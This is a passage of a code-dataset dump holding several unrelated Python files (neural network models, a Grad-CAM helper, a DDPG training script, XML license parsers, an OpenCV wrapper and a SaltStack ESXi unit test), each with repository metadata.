output_image_width])\n\n        l2_loss = tf.constant(0.0)\n\n        # Embedding layer\n        with tf.name_scope('embedding'):\n            self.W = tf.Variable(\n                tf.random_uniform([vocab_size, embedding_size], -1.0, 1.0),\n                name='W')\n            self.embedded_chars = tf.nn.embedding_lookup(self.W, self.input_x)\n            self.embedded_chars_expanded = tf.expand_dims(self.embedded_chars, -1)\n\n        # Create a convolution + maxpool layer for each filter size\n        pooled_outputs = []\n        for i, filter_size in enumerate(filter_sizes):\n            with tf.name_scope('conv-maxpool-%s' % filter_size):\n                # Convolution Layer\n                filter_shape = [filter_size, embedding_size, 1, num_filters]\n                W = tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='W')\n                b = tf.Variable(tf.constant(0.1, shape=[num_filters]), name='b')\n                conv = tf.nn.conv2d(\n                    self.embedded_chars_expanded,\n                    W,\n                    strides=[1, 1, 1, 1],\n                    padding='VALID',\n                    
name='conv')\n # Apply nonlinearity\n h = tf.nn.relu(tf.nn.bias_add(conv, b))\n # Maxpooling over the outputs\n pooled = tf.nn.max_pool(\n h,\n ksize=[1, sequence_length - filter_size + 1, 1, 1],\n strides=[1, 1, 1, 1],\n padding='VALID',\n name='pool')\n pooled_outputs.append(pooled)\n\n # Combine all the pooled features\n num_filters_total = num_filters * len(filter_sizes)\n self.h_pool = tf.concat(pooled_outputs, 3)\n\n self.h_pool_flat = tf.reshape(self.h_pool, [-1, num_filters_total])\n\n with tf.name_scope('fc1-text'):\n fc1_size = encoding_height * output_image_width * 3\n fc_w1 = tf.Variable(tf.random_normal([num_filters_total, fc1_size]))\n bd1 = tf.Variable(tf.random_normal([fc1_size]))\n fc1 = tf.add(tf.matmul(self.h_pool_flat, fc_w1), bd1)\n fc1 = tf.nn.sigmoid(fc1)\n\n self.reshaped_layer = tflearn.reshape(fc1, new_shape=[-1, encoding_height, output_image_width, 3], name='encoded_text')\n\n self.sum = tf.concat([self.reshaped_layer, resized_images], 1, name='sum')\n self.h_pool_flat_2 = tf.reshape(self.sum, [-1, output_image_width * output_image_width * 3])\n\n with tf.name_scope('dropout'):\n self.h_drop = tf.nn.dropout(self.h_pool_flat_2, self.dropout_keep_prob)\n\n with tf.name_scope('output'):\n W = tf.get_variable(\n 'W',\n shape=[output_image_width * output_image_width * 3, num_classes],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.Variable(tf.constant(0.1, shape=[num_classes]), name='b')\n l2_loss += tf.nn.l2_loss(W)\n l2_loss += tf.nn.l2_loss(b)\n self.scores = tf.nn.xw_plus_b(self.h_drop, W, b, name='scores')\n self.predictions = tf.argmax(self.scores, 1, name='predictions')\n\n with tf.name_scope('loss'):\n losses = tf.nn.softmax_cross_entropy_with_logits_v2(logits=self.scores, labels=self.input_y)\n self.loss = tf.reduce_mean(losses) + l2_reg_lambda * l2_loss\n\n with tf.name_scope('accuracy'):\n correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, 'float'), name='accuracy')\n\n","repo_name":"artelab/Multi-modal-classification","sub_path":"model/TextImgCNN.py","file_name":"TextImgCNN.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"78"} +{"seq_id":"25114592495","text":"import pygame\nfrom settings import *\nimport math\nimport numpy as np\nfrom utils import *\n\nclass Field:\n class Cell:\n def __init__(self, x, y, size):\n self.x = x\n self.y = y\n self.size = size\n self.rect = pygame.Rect(x, y, size, size)\n self.density = 0\n self.velocity = np.array([0,0])\n self.index = 0\n\n def __init__(self, env, step):\n self.step = step\n self.env = env\n self.cells = [[self.Cell(x, y, self.step) for x in range(0, WIDTH, self.step)] for y in range(0, HEIGHT, self.step)]\n print (\"created field: {} x {}\".format(len(self.cells[0]), len(self.cells)))\n\n def draw(self):\n for row in self.cells:\n for cell in row:\n pygame.draw.rect(self.env.WIN, (255, 255, 255), cell.rect, 1)\n\n def update(self):\n self.cells = [[self.Cell(x, y, self.step) for x in range(0, WIDTH, self.step)] for y in range(0, HEIGHT, self.step)]\n\n for i, row in enumerate(self.cells):\n for j, cell in enumerate(row):\n cell.velocity[0] = i\n cell.velocity[1] = j * math.sin(j)\n\n\n if DRAW_GRID: 
self.draw()","repo_name":"SlothRoss/physics","sub_path":"VectorField/Field.py","file_name":"Field.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28990686189","text":"# Nicholas Pagliocca\r\n# DDPG implementation using the fork from OpenAI baselines called Stable baselines\r\n\r\nimport gym\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom stable_baselines.ddpg.policies import MlpPolicy\r\nfrom stable_baselines.common.noise import OrnsteinUhlenbeckActionNoise\r\nfrom stable_baselines import DDPG\r\n\r\nwith open(\"Output_data_analytical.csv\", \"w\") as out_file:\r\n out_String = str( \"L1,L1_p,L1_2p,L2,L1_2p,L2_3p,b1,L2_pb2,h,Y01,Y02,Y03,Reward\")\r\n out_file.write(out_String + '\\n')\r\n\r\ni = 0\r\n\r\nwhile True:\r\n i = i+1\r\n df = pd.read_csv('Output_data_analytical.csv')\r\n\r\n max_disp = df['Reward'].max()\r\n\r\n if i > 2:\r\n\r\n last_val = df['Reward'].iloc[-1]\r\n n_last = last_val\r\n print(n_last)\r\n if last_val >= max_disp:\r\n i = 5\r\n print(i)\r\n print(max_disp)\r\n\r\n env = gym.make('Threechambera-v0')\r\n\r\n # the noise objects for DDPG\r\n n_actions = env.action_space.shape[-1]\r\n param_noise = None\r\n action_noise = OrnsteinUhlenbeckActionNoise(mean=np.zeros(n_actions), sigma=float(0.5) * np.ones(n_actions))\r\n\r\n model = DDPG(MlpPolicy, env, verbose=1, param_noise=param_noise, action_noise=action_noise, batch_size=8)\r\n model.learn(total_timesteps=500)\r\n model.save(\"test_analytical\")\r\n\r\n #del model # remove to demonstrate saving and loading\r\n\r\n model = DDPG.load(\"test_analytical\")\r\n count = 0\r\n obs = env.reset()\r\n while True:\r\n action, _states = model.predict(obs)\r\n obs, rewards, dones, info = env.step(action)\r\n count = count +1\r\n break\r\n if i == 5:\r\n break\r\n\r\n\r\n\r\n","repo_name":"Trkov-Research-Group/MDOF-soft-actuator-optimzation","sub_path":"Model-based-optimization/Model-based-DDPG/DDPG_Analytical_model_implementation.py","file_name":"DDPG_Analytical_model_implementation.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18345567947","text":"import xml.etree.ElementTree as ET\n\nclass LicensesEntry:\n type: str\n feature_description: str\n expiry_date: str\n warning: str\n name: None\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = LicensesEntry()\n data.type = node.findtext('type')\n data.feature_description = node.findtext('feature-description')\n data.expiry_date = node.findtext('expiry-date')\n data.warning = node.findtext('warning')\n data.name = node.attrib.get('name')\n return data\n\n def to_dict(self):\n return {\n 'type': self.type,\n 'feature_description': self.feature_description,\n 'expiry_date': self.expiry_date,\n 'warning': self.warning,\n 'name': self.name,\n }\n\nclass Licenses:\n licenses_entry: list[LicensesEntry]\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = Licenses()\n data.licenses_entry = [LicensesEntry.from_xml(i) for i in node.findall(\"entry\")]\n return data\n\n def to_dict(self):\n return {\n 'licenses_entry': [i.to_dict() for i in self.licenses_entry],\n }\n\nclass Entry:\n serial_no: str\n devicename: str\n licenses: Licenses\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = Entry()\n data.serial_no = node.findtext('serial-no')\n 
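# the remaining fields of this <entry> are a plain devicename text child and a nested licenses element, parsed below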
data.devicename = node.findtext('devicename')\n data.licenses = Licenses.from_xml(node.find(\"licenses\"))\n return data\n\n def to_dict(self):\n return {\n 'serial_no': self.serial_no,\n 'devicename': self.devicename,\n 'licenses': self.licenses.to_dict() if isinstance(self.licenses, Licenses) else None,\n }\n\nclass Devices:\n entry: list[Entry]\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = Devices()\n data.entry = [Entry.from_xml(i) for i in node.findall(\"entry\")]\n return data\n\n def to_dict(self):\n return {\n 'entry': [i.to_dict() for i in self.entry],\n }\n\nclass Result:\n devices: Devices\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = Result()\n data.devices = Devices.from_xml(node.find(\"devices\"))\n return data\n\n def to_dict(self):\n return {\n 'devices': self.devices.to_dict() if isinstance(self.devices, Devices) else None,\n }\n\nclass Response:\n result: Result\n status: None\n\n @staticmethod\n def from_string(xml: str):\n return Response.from_xml(ET.fromstring(xml))\n\n @staticmethod\n def from_file(xml: str):\n return Response.from_xml(ET.parse(xml).getroot())\n\n @staticmethod\n def from_xml(node: ET.Element):\n if node == None: return None\n data = Response()\n data.result = Result.from_xml(node.find(\"result\"))\n data.status = node.attrib.get('status')\n return data\n\n def to_dict(self):\n return {\n 'result': self.result.to_dict() if isinstance(self.result, Result) else None,\n 'status': self.status,\n }\n\n","repo_name":"vinicius-junio/panorama-firewall-versions","sub_path":"licenses.py","file_name":"licenses.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37231347788","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 20 02:52:14 2020\r\n\r\n@author: pbamo\r\n\"\"\"\r\nfrom __future__ import print_function\r\nimport argparse\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import DataLoader\r\nfrom torchvision import transforms\r\nimport torchvision.models as models\r\nfrom torchvision.datasets import ImageFolder\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom run_q6_1 import test, train\r\nimport multiprocessing\r\n\r\n\r\nclass Scratch(nn.Module):\r\n def __init__(self):\r\n super(Scratch, self).__init__()\r\n self.conv_1 = nn.Conv2d(3, 10, kernel_size=5)\r\n self.conv_2 = nn.Conv2d(10, 20, kernel_size=3)\r\n self.conv_3 = nn.Conv2d(20, 40, kernel_size=3)\r\n self.fully_connect_1 = nn.Linear(27040, 256)\r\n self.fully_connect_2 = nn.Linear(256, 17)\r\n\r\n def forward(self, x):\r\n x = F.relu(F.max_pool2d(self.conv_1(x), 2))\r\n x = F.relu(F.max_pool2d(self.conv_2(x), 2))\r\n x = F.relu(F.max_pool2d(self.conv_3(x), 2))\r\n x = x.view(-1, 27040)\r\n x = F.relu(self.fully_connect_1(x))\r\n x = F.dropout(x, training=self.training)\r\n x = self.fully_connect_2(x)\r\n result = F.log_softmax(x, dim=1)\r\n return result\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # Parsing arguments\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--lr', type=float, default=0.01, metavar='LR')\r\n parser.add_argument('--batch-size', type=int, default=32, metavar='N')\r\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N')\r\n parser.add_argument('--momentum', type=float, default=0.5, 
metavar='M')\r\n parser.add_argument('--no-cuda', action='store_true', default=False)\r\n parser.add_argument('--log-interval', type=int, default=10, metavar='N')\r\n parser.add_argument('--seed', type=int, default=1, metavar='S')\r\n \r\n args = parser.parse_args()\r\n \r\n use_cuda = not args.no_cuda and torch.cuda.is_available()\r\n torch.manual_seed(args.seed)\r\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\r\n kwargs = {'num_workers': multiprocessing.cpu_count(), 'pin_memory': True} if use_cuda else {}\r\n max_iters = 50\r\n\r\n #Data loading\r\n transform_data = transforms.Compose([transforms.Resize(256),transforms.RandomResizedCrop(224),transforms.ToTensor()])\r\n\r\n train_loader = DataLoader(ImageFolder('../data/oxford-flowers17/train', transform = transform_data), batch_size=args.batch_size, shuffle=True, **kwargs)\r\n valid_loader = DataLoader(ImageFolder('../data/oxford-flowers17/val', transform = transform_data), batch_size=args.batch_size, shuffle=True, **kwargs)\r\n test_loader = DataLoader(ImageFolder('../data/oxford-flowers17/test', transform = transform_data), batch_size=args.batch_size, shuffle=True, **kwargs)\r\n\r\n\r\n\r\n ##### Scratch ######\r\n model = Scratch().to(device)\r\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\r\n\r\n train_loss, train_acc = list(), list()\r\n for i in range(max_iters):\r\n loss, acc = train(args, model, device, train_loader, optimizer, i)\r\n train_loss.append(loss)\r\n train_acc.append(acc)\r\n print('Iteration: {}, Loss: {:.6f}, Accuracy: {:.6f}'.format(i, loss, acc))\r\n test(args, model, device, test_loader)\r\n \r\n x = np.arange(max_iters)\r\n plt.figure('Accuracy')\r\n plt.plot(x, train_acc)\r\n plt.xlabel('Iterations')\r\n plt.ylabel('Accuracy')\r\n plt.title('Accuracy vs Iterations - Scratch')\r\n plt.show()\r\n \r\n \r\n ##### Fine Tuning ######\r\n \r\n model = models.squeezenet1_1(pretrained=True)\r\n # print (model)\r\n num_classes = len(ImageFolder('../data/oxford-flowers17/train', transform = transform_data).classes)\r\n model.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1,1), stride=(1,1))\r\n model.num_classes = num_classes\r\n\r\n model.type(torch.FloatTensor)\r\n cross_loss = nn.CrossEntropyLoss().type(torch.FloatTensor)\r\n\r\n for param in model.parameters():\r\n param.requires_grad = False\r\n for param in model.classifier.parameters():\r\n param.requires_grad = True\r\n\r\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\r\n \r\n train_acc_fine = list()\r\n for i in range(max_iters):\r\n model.train()\r\n for x, y in train_loader:\r\n x_var = Variable(x.type(torch.FloatTensor))\r\n y_var = Variable(y.type(torch.FloatTensor).long())\r\n scores = model(x_var)\r\n loss = cross_loss(scores, y_var)\r\n \r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n # Check accuracy on the train and val sets.\r\n model.eval()\r\n match, n_values = 0, 0\r\n for x, y in train_loader:\r\n x_var = Variable(x.type(torch.FloatTensor), volatile=True)\r\n scores = model(x_var)\r\n \r\n no_need, preds = scores.data.cpu().max(1)\r\n match += (preds == y).sum()\r\n n_values += x.size(0)\r\n\r\n train_acc_f = float(match) / n_values\r\n train_acc_fine.append(train_acc_f)\r\n print('Iteration: {}, Train accuracy: {}'.format(i, train_acc_f))\r\n \r\n x = np.arange(max_iters)\r\n plt.figure('Accuracy')\r\n plt.plot(x, train_acc_fine)\r\n plt.xlabel('Iterations')\r\n plt.ylabel('Accuracy')\r\n plt.title('Accuracy vs Iterations - Fine 
Tuning')\r\n plt.show()\r\n \r\n \r\n model.eval()\r\n match, n_values = 0, 0\r\n for x, y in valid_loader:\r\n x_var = Variable(x.type(torch.FloatTensor), volatile=True)\r\n \r\n scores = model(x_var)\r\n no_need, preds = scores.data.cpu().max(1)\r\n match += (preds == y).sum()\r\n n_values += x.size(0)\r\n\r\n print('Validation accuracy: ', float(match) / n_values)","repo_name":"abhishekbamotra/computer-vision-16-720B","sub_path":"HW5/python/run_q6_2.py","file_name":"run_q6_2.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7062177469","text":"# Ref:- https://medium.com/@stepanulyanin/grad-cam-for-resnet152-network-784a1d65f3\n\n'''\nUsing Layer3 for gradcam (Not Layer4). If need to change layer, modify code accordingly\nthis GradCAM code for resnet18 model only (../models/ResNet_V2_mod.py)\nfor anyother model or layer, modify code e.g. self.features_conv, placement of out.register_hook etc ...\n'''\nimport cv2\nimport numpy\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nimport torchvision\nimport matplotlib.pyplot as plt\n\n\n\nclass res18_gradcam(nn.Module):\n def __init__(self, net):\n super(res18_gradcam, self).__init__()\n\n self.res18 = net\n\n # disect the network to access its last convolutional layer\n self.features_conv = nn.Sequential(self.res18.conv1,\n self.res18.layer1,\n self.res18.layer2,\n self.res18.layer3\n# self.res18.layer4\n ) # list(self.resx.children())[:-5]\n self.layer4 = self.res18.layer4\n\n self.linear = self.res18.linear\n\n # placeholder for the gradients\n self.gradients = None\n\n # hook for the gradients of the activations\n def activations_hook(self, grad):\n self.gradients = grad\n\n def forward(self, x):\n out = self.features_conv(x)\n\n # register the hook\n h = out.register_hook(self.activations_hook)\n \n out = self.layer4(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n\n # method for the gradient extraction\n def get_gradient(self):\n return self.gradients\n\n # method for the activation exctraction\n def get_activations(self, x):\n return self.features_conv(x)\n \ndef heatmap(res18_cam,net,img,device,channels_number=512):\n\n# res18_cam = res18_gradcam(net)\n\n # set the evaluation mode\n _ = res18_cam.eval()\n\n\n # forward pass\n pred = res18_cam(img.to(device))\n\n # Predict class\n class_idx = pred.argmax(dim=1) # e.g. 
prints tensor([2])\n\n # get the gradient of the output with respect to the parameters of the model\n pred[:, class_idx].backward()\n\n # pull the gradients out of the model\n gradients = res18_cam.get_gradient() # shape=[BN, C , H , W], BN = 1 (always as headmap for single image)\n\n # pool the gradients across the channels\n pooled_gradients = torch.mean(gradients, dim=[0, 2, 3]) # Shape [C]\n\n # get the activations of the last convolutional layer\n activations = res18_cam.get_activations(img.to(device)).detach() # Shape [1, C, H, W]\n\n # weight the channels by corresponding gradients\n for i in range(channels_number):\n activations[:, i, :, :] *= pooled_gradients[i]\n\n # average the channels of the activations\n heatmap = torch.mean(activations, dim=1).squeeze() # Shape [H, W] , mean across channel\n\n # relu on top of the heatmap\n # expression (2) in https://arxiv.org/pdf/1610.02391.pdf\n heatmap = np.maximum(heatmap.to('cpu'), 0)\n\n # normalize the heatmap\n heatmap /= torch.max(heatmap)\n \n return heatmap,class_idx\n\n\ndef grad_cam_draw(img,init_heatmap):\n image = cv2.cvtColor((img.numpy()[0]*255).transpose(1, 2, 0).astype(np.uint8), cv2.COLOR_RGB2BGR)\n heatmap = cv2.resize(init_heatmap.numpy(), (image.shape[1], image.shape[0]))\n heatmap = np.uint8(255*heatmap)\n heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)\n superimposed_img = cv2.addWeighted(image, 1., heatmap, 0.4, 0) \n fig = plt.figure()\n ax1 = fig.add_subplot(1,4,1)\n ax1.imshow(cv2.cvtColor(superimposed_img, cv2.COLOR_BGR2RGB),interpolation='bicubic')\n ax2 = fig.add_subplot(1,4,2)\n ax2.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB),interpolation='bicubic')\n ax3 = fig.add_subplot(1,4,3)\n ax3.imshow(init_heatmap*255.0)\n ax4 = fig.add_subplot(1,4,4)\n ax4.imshow(cv2.cvtColor(heatmap, cv2.COLOR_BGR2RGB),interpolation='bicubic')\n plt.show()","repo_name":"FalconnX/ResNet18V2_Augmentation_GradCAM_LRFinder_ReduceLROnPlateau","sub_path":"gradcam_resnet18.py","file_name":"gradcam_resnet18.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21276745350","text":"import cairo\nimport numpy\nimport opencv\nfrom opencv import highgui as hg\nimport os\n\n__author__ = \"Francesco Fantoni\"\n__version__ = \"0.2\"\n__copyright__ = \"Copyright (c) 2009, HVA - Hermanitos Verdes Architetti\"\n__license__ = \"lgpl\"\n\n# this imports cvBlobsLib\ntry:\n from .blobs.BlobResult import CBlobResult\n from .blobs.Blob import CBlob # Note: This must be imported in order to destroy blobs and use other methods\nexcept:\n print(\"Could not load blobs extension, some of the library features will not be available\")\n pass\n\nclass Movie:\n\n def __init__(self, path, start=0, stop=None):\n self.path = path\n self.video = hg.cvCreateFileCapture(self.path)\n\n # these functions don't seem to work at present on my linux system\n\n # self.fps = hg.cvGetCaptureProperty(self.video, hg.CV_CAP_PROP_FPS)\n # self.n_of_frames = hg.cvGetCaptureProperty(self.video, hg.CV_CAP_PROP_FRAME_COUNT)\n # self.duration = self.n_of_frames/self.fps\n # self.width = hg.cvGetCaptureProperty(self.video, hg.CV_CAP_PROP_FRAME_WIDTH)\n # self.height = hg.cvGetCaptureProperty(self.video, hg.CV_CAP_PROP_FRAME_HEIGHT)\n hg.cvSetCaptureProperty(self.video, hg.CV_CAP_PROP_POS_FRAMES, start)\n\n def frame(self, t=None, flip=False, bthreshold=128, bthreshmode=0):\n frame = MovieFrame(src=self.video, time=t, flipped=flip, thresh=bthreshold, thmode=bthreshmode)\n return 
frame\n\n\ndef movie(path, start=0, stop=None):\n return Movie(path, start, stop)\n\n\nclass Camera:\n\n def __init__(self, cam=0, width=None, height=None):\n self.path = cam\n self.video = hg.cvCreateCameraCapture(self.path)\n if width:\n hg.cvSetCaptureProperty(self.video, hg.CV_CAP_PROP_FRAME_WIDTH, width)\n if height:\n hg.cvSetCaptureProperty(self.video, hg.CV_CAP_PROP_FRAME_HEIGHT, height)\n\n def release_camera(camera=self.video):\n print(camera) # this for debugging, do not leave it!!!\n print(dir(camera)) # same as above\n opencv.cvReleaseCapture(camera)\n _ctx.drawing_closed = release_camera\n\n def frame(self, t=None, flip=False, bthreshold=128, bthreshmode=0):\n try:\n frame = MovieFrame(src=self.video, time=None, flipped=flip, thresh=bthreshold, thmode=bthreshmode)\n except:\n opencv.cvReleaseCapture(self.video)\n raise \"could not grab frame, closed camera capture\"\n return frame\n\n\ndef camera(cam=0, width=None, height=None):\n return Camera(cam, width, height)\n\n\nclass Image:\n\n def __init__(self, path=None):\n self.path = path\n try:\n self.iplimage = hg.cvLoadImage(self.path)\n except:\n raise AttributeError(\"could not load image file\")\n\n def _data(self):\n return ipl2cairo(self.iplimage)\n data = property(_data)\n\n def contours(self, threshold=100):\n return findcontours(self.iplimage, threshold)\n\n def haar(self, classifier):\n return detectHaar(self.iplimage, classifier)\n\n\ndef image(path=None):\n return Image(path)\n\n\nclass MovieFrame:\n\n def __init__(self, src=\"\", time=None, flipped=False, thresh=128, thmode=0):\n\n self.src = src\n self.time = time\n self.bthresh = thresh\n self.bthreshmode = thmode\n if self.time:\n hg.cvSetCaptureProperty(self.src, hg.CV_CAP_PROP_POS_FRAMES, self.time)\n self.iplimage = hg.cvQueryFrame(self.src)\n if flipped:\n opencv.cvFlip(self.iplimage, None, 1)\n self.width = self.iplimage.width\n self.height = self.iplimage.height\n\n def _data(self):\n return ipl2cairo(self.iplimage)\n data = property(_data)\n\n def _faces(self):\n self.classifier = \"haarcascade_frontalface_alt\"\n return detectHaar(self.iplimage, self.classifier)\n faces = property(_faces)\n\n def _blobs(self):\n return Blobs(self)\n blobs = property(_blobs)\n\n def contours(self, threshold=100):\n return findcontours(self.iplimage, threshold)\n\n def haar(self, classifier):\n return detectHaar(self.iplimage, classifier)\n\n\nclass Blobs:\n\n def __init__(self, frame):\n self.blob_image = opencv.cvCloneImage(frame.iplimage)\n self.blob_gray = opencv.cvCreateImage(opencv.cvGetSize(self.blob_image), 8, 1)\n self.blob_mask = opencv.cvCreateImage(opencv.cvGetSize(self.blob_image), 8, 1)\n opencv.cvSet(self.blob_mask, 1)\n opencv.cvCvtColor(self.blob_image, self.blob_gray, opencv.CV_BGR2GRAY)\n # opencv.cvEqualizeHist(self.blob_gray, self.blob_gray)\n # opencv.cvThreshold(self.blob_gray, self.blob_gray, frame.thresh, 255, opencv.CV_THRESH_BINARY)\n # opencv.cvThreshold(self.blob_gray, self.blob_gray, frame.thresh, 255, opencv.CV_THRESH_TOZERO)\n opencv.cvThreshold(self.blob_gray, self.blob_gray, frame.bthresh, 255, frame.bthreshmode)\n # opencv.cvAdaptiveThreshold(self.blob_gray, self.blob_gray, 255, opencv.CV_ADAPTIVE_THRESH_MEAN_C, opencv.CV_THRESH_BINARY_INV)\n self._frame_blobs = CBlobResult(self.blob_gray, self.blob_mask, 100, True)\n self._frame_blobs.filter_blobs(10, 10000)\n self.count = self._frame_blobs.GetNumBlobs()\n self.items = []\n for i in range(self.count):\n self.items.append(self._frame_blobs.GetBlob(i))\n\n\nclass Haarobj:\n\n def 
__init__(self, obj):\n self.x = obj.x\n self.y = obj.y\n self.width = obj.width\n self.height = obj.height\n\n\n# common utility functions\n\ndef ipl2cairo(iplimage):\n srcimage = opencv.cvCloneImage(iplimage)\n width = srcimage.width\n height = srcimage.height\n image = opencv.cvCreateImage(opencv.cvGetSize(srcimage), 8, 4)\n opencv.cvCvtColor(srcimage, image, opencv.CV_BGR2BGRA)\n buffer = numpy.fromstring(image.imageData, dtype=numpy.uint32).astype(numpy.uint32)\n buffer.shape = (image.width, image.height)\n opencv.cvReleaseImage(srcimage)\n opencv.cvReleaseImage(image)\n return cairo.ImageSurface.create_for_data(buffer, cairo.FORMAT_RGB24, width, height, width * 4)\n\n\ndef detectHaar(iplimage, classifier):\n srcimage = opencv.cvCloneImage(iplimage)\n grayscale = opencv.cvCreateImage(opencv.cvGetSize(srcimage), 8, 1)\n opencv.cvCvtColor(srcimage, grayscale, opencv.CV_BGR2GRAY)\n storage = opencv.cvCreateMemStorage(0)\n opencv.cvClearMemStorage(storage)\n opencv.cvEqualizeHist(grayscale, grayscale)\n try:\n cascade = opencv.cvLoadHaarClassifierCascade(os.path.join(os.path.dirname(__file__), classifier + \".xml\"), opencv.cvSize(1, 1))\n except:\n raise AttributeError(\"could not load classifier file\")\n objs = opencv.cvHaarDetectObjects(grayscale, cascade, storage, 1.2, 2, opencv.CV_HAAR_DO_CANNY_PRUNING, opencv.cvSize(50, 50))\n objects = []\n for obj in objs:\n objects.append(Haarobj(obj))\n opencv.cvReleaseImage(srcimage)\n opencv.cvReleaseImage(grayscale)\n opencv.cvReleaseMemStorage(storage)\n return objects\n\n\ndef findcontours(iplimage, threshold=100):\n srcimage = opencv.cvCloneImage(iplimage)\n # create the storage area and bw image\n grayscale = opencv.cvCreateImage(opencv.cvGetSize(srcimage), 8, 1)\n opencv.cvCvtColor(srcimage, grayscale, opencv.CV_BGR2GRAY)\n # threshold\n opencv.cvThreshold(grayscale, grayscale, threshold, 255, opencv.CV_THRESH_BINARY)\n storage = opencv.cvCreateMemStorage(0)\n opencv.cvClearMemStorage(storage)\n # find the contours\n nb_contours, contours = opencv.cvFindContours(grayscale, storage)\n # comment this out if you do not want approximation\n contours = opencv.cvApproxPoly(contours, opencv.sizeof_CvContour, storage, opencv.CV_POLY_APPROX_DP, 3, 1)\n # next line is for ctypes-opencv\n # contours = opencv.cvApproxPoly (contours, opencv.sizeof(opencv.CvContour), storage, opencv.CV_POLY_APPROX_DP, 3, 1)\n conts = []\n for cont in contours.hrange():\n points = []\n for pt in cont:\n points.append((pt.x, pt.y))\n conts.append(points)\n opencv.cvReleaseMemStorage(storage)\n opencv.cvReleaseImage(srcimage)\n opencv.cvReleaseImage(grayscale)\n return (nb_contours, conts)\n","repo_name":"shoebot/shoebot","sub_path":"lib/sbopencv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8167,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"78"} +{"seq_id":"12855912854","text":"\"\"\"\ntests.unit.states.test_esxi\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nUnit tests for the esxi state module\n\"\"\"\n\nimport salt.modules.vsphere as vsphere\nimport salt.states.esxi as esxi\nfrom tests.support.case import TestCase\nfrom tests.support.mixins import LoaderModuleMockMixin\nfrom tests.support.mock import MagicMock, patch\n\n\nclass TestCertificateVerify(TestCase, LoaderModuleMockMixin):\n def setup_loader_modules(self):\n return {\n esxi: {\n \"__opts__\": {\"test\": False},\n \"__pillar__\": {\"proxy\": {\"host\": \"hostname\", \"proxytype\": \"esxi\"}},\n },\n vsphere: {},\n }\n\n def 
test_certificate_verify(self):\n kwargs_values = [\n (\"ssh_key\", \"TheSSHKeyFile\"),\n (\"ssh_key_file\", \"TheSSHKeyFile\"),\n ]\n certificate_verify_values = (None, True, False)\n for kw_key, kw_value in kwargs_values:\n\n def esxi_cmd_wrapper(target, *args, **kwargs):\n # The esxi salt module just wraps the call to the esxi proxy\n # module which in turn calls the target method on the vsphere\n # execution moduile.\n # That would be a TON of mocking, so we just bypass all of that\n # wrapping\n if target == \"upload_ssh_key\":\n return vsphere.upload_ssh_key(\n \"1.2.3.4\", \"root\", \"SuperSecret!\", *args, **kwargs\n )\n return {\"hostname\": {}}\n\n service_running = patch.dict(esxi.__salt__, {\"esxi.cmd\": esxi_cmd_wrapper})\n kwargs = {kw_key: kw_value}\n if kw_key == \"ssh_key\":\n expected_kwargs = {\"data\": kw_value}\n else:\n expected_kwargs = {\"data_file\": kw_value, \"data_render\": False}\n for certificate_verify_value in certificate_verify_values:\n http_query_mock = MagicMock()\n if certificate_verify_value is None:\n certificate_verify_value = True\n with patch(\"salt.utils.http.query\", http_query_mock), service_running:\n esxi.ssh_configured(\n \"blah\",\n service_running=True,\n service_restart=False,\n certificate_verify=certificate_verify_value,\n **kwargs\n )\n http_query_mock.assert_called_once_with(\n \"https://1.2.3.4:443/host/ssh_root_authorized_keys\",\n method=\"PUT\",\n password=\"SuperSecret!\",\n status=True,\n text=True,\n username=\"root\",\n verify_ssl=certificate_verify_value,\n **expected_kwargs\n )\n","repo_name":"saltstack/salt","sub_path":"tests/unit/states/test_esxi.py","file_name":"test_esxi.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"15114576804","text":"from pprint import pprint\n# import requests\n# TASK 1\n# heroes_list = ['Hulk', 'Captain America', 'Thanos']\n# for 